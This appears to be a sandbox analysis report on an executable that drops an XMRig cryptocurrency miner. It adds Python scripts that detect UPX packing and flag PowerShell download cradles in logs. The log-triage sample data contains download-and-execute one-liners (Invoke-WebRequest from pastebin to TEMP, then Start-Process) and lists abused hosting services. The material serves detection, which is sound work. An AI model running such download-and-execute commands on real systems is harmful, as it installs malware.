General

  • Target

    93ea8abb8e16d2661f06e607c37ab0d0_NeikiAnalytics.exe

  • Size

    3.2MB

  • Sample

    240614-avm2wa1fmn

  • MD5

    93ea8abb8e16d2661f06e607c37ab0d0

  • SHA1

    cfd6690ad8647df1937fcd0bfeab86f095d36805

  • SHA256

    80cd5991af8c96fc742276a45d103c7dab724cb63f9ba994caa90852a967ae5b

  • SHA512

    40802cda5ac0ff7853422ab78fbd6e4f9b46f9579412bdd3aa5fd298df1d67ccfe137220d7c82f30bc4ebe031fcf1fdccacc59456d8e31e538226fa095eaa414

  • SSDEEP

    98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWw:7bBeSFk8

Targets

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU cryptocurrency miner (Monero), routinely dropped by cryptojacking loaders.

    • XMRig Miner payload

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest used to download a payload.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with the open-source UPX packer, or with a modified UPX build (renamed sections, patched signature).

    • Legitimate hosting services abused for malware hosting/C2
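The "UPX packed file" signature above is worth being able to reproduce by hand, because stock UPX is easy to spot by section name while a modified build is not. The following is an added example (not code from the sandbox, and not derived from the analysed sample): it parses the PE section table directly with `struct`, reports the classic UPX tells (UPX0/UPX1 section names, the "UPX!" info-header magic, an empty first section that serves as the decompression target, and a high-entropy section holding the compressed image) and derives a verdict that still fires when the names and marker have been stripped. The three PE images it runs on are constructed in memory; the entropy threshold and the layout heuristic are assumptions, not the sandbox's rule.

```python
"""Added example: flag UPX-style packing from a PE's section table (stock and renamed UPX).
Not part of the sandbox report or the sample; the PE images below are constructed in memory."""
import hashlib
import math
import struct

# Section names written by stock UPX builds.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
# Shannon entropy (bits/byte) above which a section is treated as compressed (assumed threshold).
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the byte distribution in data (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes):
    """Parse the section table of a PE image: list of (name, PointerToRawData, SizeOfRawData)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]      # COFF.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]         # COFF.SizeOfOptionalHeader
    table = coff + 20 + opt_size                                  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                                      # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, raw_ptr, raw_size))
    return sections


def upx_indicators(pe: bytes) -> dict:
    """Return the individual UPX indicators plus an overall verdict."""
    secs = pe_sections(pe)
    max_entropy = max((shannon_entropy(pe[ptr:ptr + size]) for _, ptr, size in secs if size), default=0.0)
    ind = {
        # stock UPX: section names UPX0/UPX1 (UPX2 when resources are kept separate)
        "upx_section_names": any(name in UPX_SECTION_NAMES for name, _, _ in secs),
        # stock UPX: "UPX!" magic in the packer's info header (usually patched out of modified builds)
        "upx_marker": b"UPX!" in pe,
        # UPX layout: the first section is the in-memory decompression target and has no raw data on disk
        "empty_first_section": bool(secs) and secs[0][2] == 0,
        # the section holding the compressed image looks random
        "high_entropy_section": max_entropy > ENTROPY_THRESHOLD,
    }
    # A renamed ("modified UPX") build drops the names and marker but keeps the stub layout.
    ind["verdict"] = ind["upx_section_names"] or (ind["empty_first_section"] and ind["high_entropy_section"])
    return ind


def build_pe(sections) -> bytes:
    """Construct a minimal, non-runnable PE32 image whose section table carries the given
    (name, raw_bytes) pairs; raw_bytes == b"" yields SizeOfRawData 0, as for UPX0."""
    e_lfanew, opt_size = 0x40, 0xE0
    table = e_lfanew + 4 + 20 + opt_size
    ptr, vaddr = table + 40 * len(sections), 0x1000
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)       # PE32 magic, rest zeroed
    headers, body = b"", b""
    for name, raw in sections:
        headers += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", max(len(raw), 0x1000), vaddr, len(raw), ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
        vaddr += 0x1000
    return dos + b"PE\0\0" + coff + opt + headers + body


# Constructed test images (not derived from the analysed sample).
HIGH_ENTROPY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4 KiB deterministic pseudo-random
STOCK_UPX = build_pe([(b"UPX0", b""), (b"UPX1", b"UPX!" + HIGH_ENTROPY), (b".rsrc", b"\0" * 512)])
RENAMED_UPX = build_pe([(b".text", b""), (b".data", HIGH_ENTROPY), (b".rsrc", b"\0" * 512)])
CLEAN = build_pe([(b".text", b"\x55\x8b\xec\x5d\xc3" * 400), (b".data", b"\0" * 1024)])

if __name__ == "__main__":
    for label, image in (("stock UPX", STOCK_UPX), ("renamed UPX", RENAMED_UPX), ("clean", CLEAN)):
        print(label, upx_indicators(image))
```

Section names and the "UPX!" string are trivially edited after packing, which is why the verdict also keys on layout; for a real sample, feed the file bytes to `upx_indicators` (or compare against `pefile`'s section view) and treat the name hit as confirmation, not as the only test.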

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic               Technique                          Count  ID
  Execution            Command and Scripting Interpreter  1      T1059
  Execution            PowerShell                         1      T1059.001
  Command and Control  Web Service                        1      T1102
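The two mapped techniques (T1059.001 from the Invoke-WebRequest signature, T1102 from the "legitimate hosting services abused" signature) are the kind of thing a detection engineer would want to confirm from PowerShell script-block logging rather than from the sandbox alone. The following is an added example, not the sandbox's own rule: it classifies PowerShell ScriptBlock text (Event ID 4104) by looking for Invoke-WebRequest and its aliases together with other common download cradles, and raises T1102 only when the fetched URL's host is (or is a subdomain of) an assumed list of file-hosting services. The log records and the hosting-service list are constructed for the example.

```python
"""Added example: classify PowerShell ScriptBlock text (Event ID 4104) against the two techniques
the report maps, T1059.001 (PowerShell) and T1102 (Web Service). Not part of the sandbox report;
the log lines and the hosting-service list are constructed for the example."""
import re

# Services commonly abused for payload/C2 hosting (assumed list; extend to taste).
HOSTING_SERVICES = (
    "pastebin.com", "github.com", "githubusercontent.com", "discord.com",
    "discordapp.com", "transfer.sh", "dropbox.com", "drive.google.com",
)
# Invoke-WebRequest and its Windows PowerShell aliases (iwr, wget, curl), Invoke-RestMethod (irm),
# and the WebClient download methods that show up in one-liner cradles.
CRADLE = re.compile(
    r"\b(Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm|DownloadString|DownloadFile|DownloadData)\b",
    re.I,
)
URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def abused_host(host: str) -> bool:
    """True when host equals, or is a subdomain of, a listed hosting service (suffix match is anchored
    on a dot so github.com.evil.example does not qualify)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in HOSTING_SERVICES)


def classify_scriptblock(text: str) -> list:
    """ATT&CK technique IDs triggered by one script block, sorted."""
    hits = set()
    if CRADLE.search(text):
        hits.add("T1059.001")
        if any(abused_host(m.group(1)) for m in URL.finditer(text)):
            hits.add("T1102")
    return sorted(hits)


def triage(lines):
    """(1-based line number, techniques) for every 4104 record that triggers at least one technique.
    Records are 'EventID|ScriptBlockText' (constructed format for the example)."""
    out = []
    for i, line in enumerate(lines, 1):
        event_id, _, script = line.partition("|")
        if event_id == "4104":
            hits = classify_scriptblock(script)
            if hits:
                out.append((i, hits))
    return out


# Constructed log records, not taken from the sandbox run.
SAMPLE_LOGS = [
    "4104|Invoke-WebRequest -Uri https://pastebin.com/raw/EXAMPLE -OutFile $env:TEMP\\svc.exe; Start-Process $env:TEMP\\svc.exe",
    "4104|iwr 'https://cdn.discordapp.com/attachments/0/0/x.bin' -UseBasicParsing | Out-File x.bin",
    "4104|Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "4104|Invoke-WebRequest -Uri https://updates.example.internal/patch.msi -OutFile patch.msi",
    "4103|Invoke-WebRequest -Uri https://pastebin.com/raw/EXAMPLE",
]

if __name__ == "__main__":
    for lineno, techniques in triage(SAMPLE_LOGS):
        print(lineno, techniques)
```

Line 4 in the sample shows the point of splitting the two techniques: an internal download cradle is still PowerShell execution worth logging, but it is not web-service abuse, so it gets T1059.001 alone; line 5 is ignored because only 4104 carries the script text.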

Tasks